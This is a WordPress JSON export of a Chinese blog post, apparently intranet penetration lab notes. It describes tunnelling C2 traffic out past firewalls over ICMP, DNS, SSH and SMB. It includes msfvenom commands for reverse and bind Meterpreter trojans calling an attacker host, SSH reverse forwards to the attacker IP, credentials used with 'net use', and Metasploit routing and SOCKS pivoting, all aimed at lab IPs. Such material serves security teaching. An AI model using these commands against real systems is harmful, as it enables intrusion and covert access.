1.\u5355\u673a\n\u9632\u706b\u5899\u914d\u7f6e\u8fc7\u7a0b\uff1a\u9ad8\u7ea7\u9632\u706b\u5899\u914d\u7f6e–\u51fa\u5165\u7ad9\u6dfb\u52a0\u89c4\u5219\u5373\u53ef<\/p>\n\n\n\n
2.\u9650\u5236\u7aef\u53e3\u51fa\u5165\u7ad9\n\u68c0\u6d4b\u7aef\u53e3\u7981\u7528\u4e86\u54ea\u4e9b\uff0c\u5f00\u653e\u4e86\u54ea\u4e9b\n\u7aef\u53e3\u51fa\u5165\u7ad9\u89c4\u5219\n\u6b63\u53cd\u5411\u8fde\u63a5\u68c0\u6d4b<\/p>\n\n\n\n
3.\u9650\u5236\u534f\u8bae\u51fa\u5165\u7ad9=>\u7528\u5176\u4ed6\u534f\u8bae\u4e0a\u7ebf\n1.\u534f\u8bae&TCP&UDP&ICMP&L2TP\u7b49<\/p>\n\n\n\n
gpmc.msc\t=>\u5f3a\u5236=>\u5176\u4ed6\u57df\u63a7\u6210\u5458\u4e0d\u80fd\u4fee\u6539\u7b56\u7565\u5b9a\u4e49\u7684\u914d\u7f6e\n\u57df\u63a7\u6210\u5458\u6267\u884c\u547d\u4ee4\uff1agpupdate\/force<\/code><\/pre>\n\n\n\nicmp\u534f\u8bae\u96a7\u9053\u642d\u5efa<\/h4>\n\n\n\n\u5c06tcp\u8f6c\u6362\u4f4dicmp\t\u653b\u51fb\u7aef\u63a5\u6536icmp\u8f6c\u6362\u4e3atcp\t\t\u6728\u9a6c\u76d1\u542c\u7aef\u53e3\t \nhttps:\/\/github.com\/esrrhs\/spp\n\nhttps:\/\/github.com\/bdamele\/icmpsh\n\nhttps:\/\/github.com\/esrrhs\/pingtunnel\n\n\u653b\u51fb\u673a:\tcs\u670d\u52a1\u7aef\tkali=>msf\n.\/pingtunnel -type server\n\n\n\u4e0a\u4f20\u6587\u4ef6\u5230\u9776\u673a=>\u6267\u884c\u547d\u4ee4\npingtunnel.exe -type client -l 127.0.0.1:port -s cs\u670d\u52a1\u7aefip -t cs\u670d\u52a1\u7aefip:\u7aef\u53e3 -tcp 1 -noprint 1 -nolog 1<\/code><\/pre>\n\n\n\ndns\u96a7\u9053\u57df\u540d<\/h4>\n\n\n\n\u521b\u5efa\u4e09\u4e2a\u57df\u540d\tA NS\tNS \n\u76d1\u542c\u5668\u521b\u5efa\u53ca\u914d\u7f6epayload(Beacon DNS)=>\u6dfb\u52a0\u4e24\u4e2ans\n\u540e\u95e8\u7ed1\u5b9a\u76d1\u542c\u5668\u53ca\u751f\u6210\ndns<\/code><\/pre>\n\n\n\nSSH\u96a7\u9053(\u57df\u540d)<\/h4>\n\n\n\n
\u7528msf(cs)\u4e0a\u7ebflinux\u7cfb\u7edf<\/p>\n\n\n\n
\u4e8eSSH\u534f\u8bae\u5b58\u5728\u4e8eLinux\u7cfb\u7edf\uff0c\u8df3\u677f\u673a\u5fc5\u987bLinux\niptables -F \/* \u6e05\u9664\u6240\u6709\u89c4\u5219 *\/\niptables -A INPUT -p tcp --dport 22 -j ACCEPT \/*\u5141\u8bb8\u5305\u4ece22\u7aef\u53e3\u8fdb\u5165*\/\niptables -A OUTPUT -p tcp --sport 22 -m state --state ESTABLISHED -j ACCEPT \/*\u5141\u8bb8\u4ece22\u7aef\u53e3\u8fdb\u5165\u7684\u5305\u8fd4\u56de*\/\niptables -A OUTPUT -p udp --dport 53 -j ACCEPT \/* \u57df\u540d\u89e3\u6790\u7aef\u53e3\uff0c\u4e00\u822c\u4e0d\u5f00 *\/\niptables -A INPUT -p udp --sport 53 -j ACCEPT \/* \u57df\u540d\u89e3\u6790\u7aef\u53e3\uff0c\u4e00\u822c\u4e0d\u5f00 *\/\niptables -A INPUT -s 127.0.0.1 -d 127.0.0.1 -j ACCEPT \/*\u5141\u8bb8\u672c\u673a\u8bbf\u95ee\u672c\u673a*\/\niptables -A OUTPUT -s 127.0.0.1 -d 127.0.0.1 -j ACCEPT\niptables -A INPUT -p tcp -s 0\/0 --dport 80 -j ACCEPT \/*\u5141\u8bb8\u6240\u6709IP\u8bbf\u95ee80\u7aef\u53e3*\/\niptables -A OUTPUT -p tcp --sport 80 -m state --state ESTABLISHED -j ACCEPT\niptables-save > \/etc\/sysconfig\/iptables \/*\u4fdd\u5b58\u914d\u7f6e*\/\niptables -L \/* \u663e\u793aiptables\u5217\u8868 *\/\n<\/code><\/pre>\n\n\n\n\u8fdc\u7a0b\uff1a\u9488\u5bf9\u5165\u7ad9\u8fc7\u6ee4<\/p>\n\n\n\n
ssh -CfNg -R 1234:\u5185\u7f51ip:80 root@\u653b\u51fb\u673aip<\/p>\n\n\n\n
\u672c\u5730\uff1a\u9488\u5bf9\u51fa\u7ad9\u8fc7\u6ee4<\/p>\n\n\n\n
ssh -CfNg -L 1122:\u5185\u7f51ip:80 root@linux\u9776\u673aip<\/p>\n\n\n\n
ssh -CfNg -L 1122:192.168.3.31:80 root@192.168.43.41<\/p>\n\n\n\n
SMB\u534f\u8bae\u96a7\u9053<\/h4>\n\n\n\n
shell net use \\\\192.168.3.31 \/u:webadmin admin!@#45<\/p>\n\n\n\n
\u4ee3\u7406\u6280\u672f<\/h2>\n\n\n\n
\u73af\u5883:<\/p>\n\n\n\n
\u5185\u7f51\u7f51\u6bb5 192.168.3.0<\/p>\n\n\n\n
\u5916\u7f51\u7f51\u6bb5 192.168.43.0<\/p>\n\n\n\n
\u653b\u51fb\u673a:kali\t192.168.43.3<\/p>\n\n\n\n
centos7\t192.168.43.52<\/p>\n\n\n\n
sqlserver2012 192.168.3.32 \t192.168.43.55<\/p>\n\n\n\n
webserver2008\t192.168.3.31\t<\/p>\n\n\n\n
===MSF\u4ee3\u7406\u4e0a\u7ebf(Proxifier\u4ee3\u7406)===<\/h3>\n\n\n\n
\u7b2c\u4e00\u6b65\u3001\u6dfb\u52a0\u8def\u7531 \u9650\u4e8eMSF<\/p>\n\n\n\n
kali \u521b\u5efa\u6728\u9a6c:\nmsfvenom -p windows\/meterpreter\/reverse_tcp lhost=192.168.43.3 lport=8911 -f exe > shell222.exe\n\n\u76d1\u542c\u7aef\u53e3\n\u4e0a\u7ebfsqlserver<\/code><\/pre>\n\n\n\n1)\u67e5\u770b\u8def\u7531\u4fe1\u606f<\/p>\n\n\n\n
run post\/multi\/manage\/autoroute\t#\u83b7\u53d6\u8def\u7531\u4fe1\u606f\u60c5\u51b5\nrun autoroute -p\t\t#\u67e5\u770b\u8def\u7531\u60c5\u51b5<\/code><\/pre>\n\n\n\n2)\u6dfb\u52a0\u6307\u5b9a\u8def\u7531(\u770b\u9700\u6c42\u53ef\u5ffd\u7565)<\/p>\n\n\n\n
route add 192.168.3.0 255.255.255.0 1\nroute add <IP> <\u63a9\u7801> <session>\nroute print<\/code><\/pre>\n\n\n\n\u7b2c\u4e8c\u6b65\u3001Sock\u4ee3\u7406 \u5168\u5c40\u540c\u7528<\/p>\n\n\n\n
kali:\nuse auxiliary\/server\/socks_proxy\nset srvhost 0.0.0.0\nset srvport 1115\nrun<\/code><\/pre>\n\n\n\n\u4efb\u610fwin\u542f\u7528\u4ee3\u7406\u8f6f\u4ef6proxifuer.exe\u914d\u7f6eSock5\u4ee3\u7406 ip\u4e0e\u7aef\u53e3\u8bbe\u7f6e\u4e0a\u9762\u914d\u7f6e\u7684\u8fdb\u884c\u8fde\u63a5\u5373\u53ef\n\n\u670d\u52a1\u5668\u5730\u5740192.168.43.3\t\u7aef\u53e3:1115\n\n\u534f\u8bae\u9009\u62e9socks 5\n\n\u4ee3\u7406\u89c4\u5219192.168.3.*<\/code><\/pre>\n\n\n\n\u7b2c\u4e09\u6b65\u3001MSF\u63a7\u5236\u6df1\u5c42\u4e0a\u7ebf1-\u6b63\u5411\u8fde\u63a5=>\u53ef\u521b\u5efa\u591a\u4e2a<\/p>\n\n\n\n
kali:\u521b\u5efa\u6b63\u5411\u8fde\u63a5\u6728\u9a6c\nmsfvenom -p windows\/meterpreter\/bind_tcp LHOST=0.0.0.0 LPORT=9999 -f exe > cab.exe\n\nuse exploit\/multi\/handler\nset payload windows\/meterpreter\/bind_tcp\nset rhost 192.168.3.31 \uff08\u6b64\u5904\u4e3a\u8be5\u5c42\u673a\u5668IP\uff09\nset lport 6666\nrun<\/code><\/pre>\n\n\n\nSocksCap64(Normal User Mode)<\/p>\n","protected":false},"excerpt":{"rendered":"
\u57fa\u7840 1.\u5355\u673a \u9632\u706b\u5899\u914d\u7f6e\u8fc7\u7a0b\uff1a\u9ad8\u7ea7\u9632\u706b\u5899\u914d\u7f6e–\u51fa\u5165\u7ad9\u6dfb\u52a0\u89c4\u5219\u5373\u53ef 2.\u9650\u5236\u7aef\u53e3\u51fa\u5165\u7ad9 \u68c0\u6d4b\u7aef\u53e3\u7981 … <\/p>\n","protected":false},"author":3,"featured_media":93,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-92","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-neiwang"],"_links":{"self":[{"href":"https:\/\/www.redspear.cn\/index.php\/wp-json\/wp\/v2\/posts\/92","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.redspear.cn\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.redspear.cn\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.redspear.cn\/index.php\/wp-json\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"https:\/\/www.redspear.cn\/index.php\/wp-json\/wp\/v2\/comments?post=92"}],"version-history":[{"count":2,"href":"https:\/\/www.redspear.cn\/index.php\/wp-json\/wp\/v2\/posts\/92\/revisions"}],"predecessor-version":[{"id":143,"href":"https:\/\/www.redspear.cn\/index.php\/wp-json\/wp\/v2\/posts\/92\/revisions\/143"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.redspear.cn\/index.php\/wp-json\/wp\/v2\/media\/93"}],"wp:attachment":[{"href":"https:\/\/www.redspear.cn\/index.php\/wp-json\/wp\/v2\/media?parent=92"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.redspear.cn\/index.php\/wp-json\/wp\/v2\/categories?post=92"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.redspear.cn\/index.php\/wp-json\/wp\/v2\/tags?post=92"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}